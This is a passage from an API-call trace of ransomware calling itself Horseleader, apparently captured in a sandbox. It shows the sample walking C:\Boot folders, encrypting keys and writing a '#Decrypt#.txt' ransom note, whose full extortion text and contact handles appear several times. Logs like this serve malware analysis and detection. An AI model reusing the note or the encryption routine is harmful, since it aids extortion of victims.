(lpString1=".", lpString2="Windows") returned -1 [0124.833] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0124.833] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.833] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.833] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.833] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0124.834] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.834] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.834] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.834] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.834] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0124.834] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.834] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.834] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.835] lstrlenW (lpString=".testttjffg") returned 11 [0124.835] StrStrW (lpFirst="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.835] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.835] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.835] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.835] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.836] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.836] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\#Decrypt#.txt") returned 31 [0124.836] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\#Decrypt#.txt" (normalized: "c:\\boot\\pt-br\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.837] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0124.837] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.838] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0124.838] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.839] CloseHandle (hObject=0x1dc) returned 1 [0124.839] GetProcessHeap () returned 0x780000 [0124.839] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.839] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0124.839] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0124.839] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0124.839] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0124.840] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0124.840] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.840] GetProcessHeap () returned 0x780000 [0124.840] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.840] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0124.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.841] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.841] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0124.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.841] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.841] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.841] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0124.855] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.855] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.855] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.855] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.856] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0124.856] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.856] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.856] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.856] lstrlenW (lpString=".testttjffg") returned 11 [0124.856] StrStrW (lpFirst="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.856] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.856] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.857] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.910] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.911] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.911] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\#Decrypt#.txt") returned 31 [0124.911] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\#Decrypt#.txt" (normalized: "c:\\boot\\pt-pt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.911] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0124.911] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.913] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0124.914] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.914] CloseHandle (hObject=0x1dc) returned 1 [0124.914] GetProcessHeap () returned 0x780000 [0124.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.914] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0124.914] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0124.915] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0124.915] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0124.915] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0124.915] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ru-RU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.915] GetProcessHeap () returned 0x780000 [0124.915] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.915] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0124.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.916] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0124.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.916] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.916] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0124.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.917] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.917] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.917] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.917] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0124.917] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.917] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.917] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.917] lstrlenW (lpString=".testttjffg") returned 11 [0124.917] StrStrW (lpFirst="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.918] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.918] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.918] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.918] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.918] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.919] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\#Decrypt#.txt") returned 31 [0124.919] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\#Decrypt#.txt" (normalized: "c:\\boot\\ru-ru\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.919] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0124.920] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, 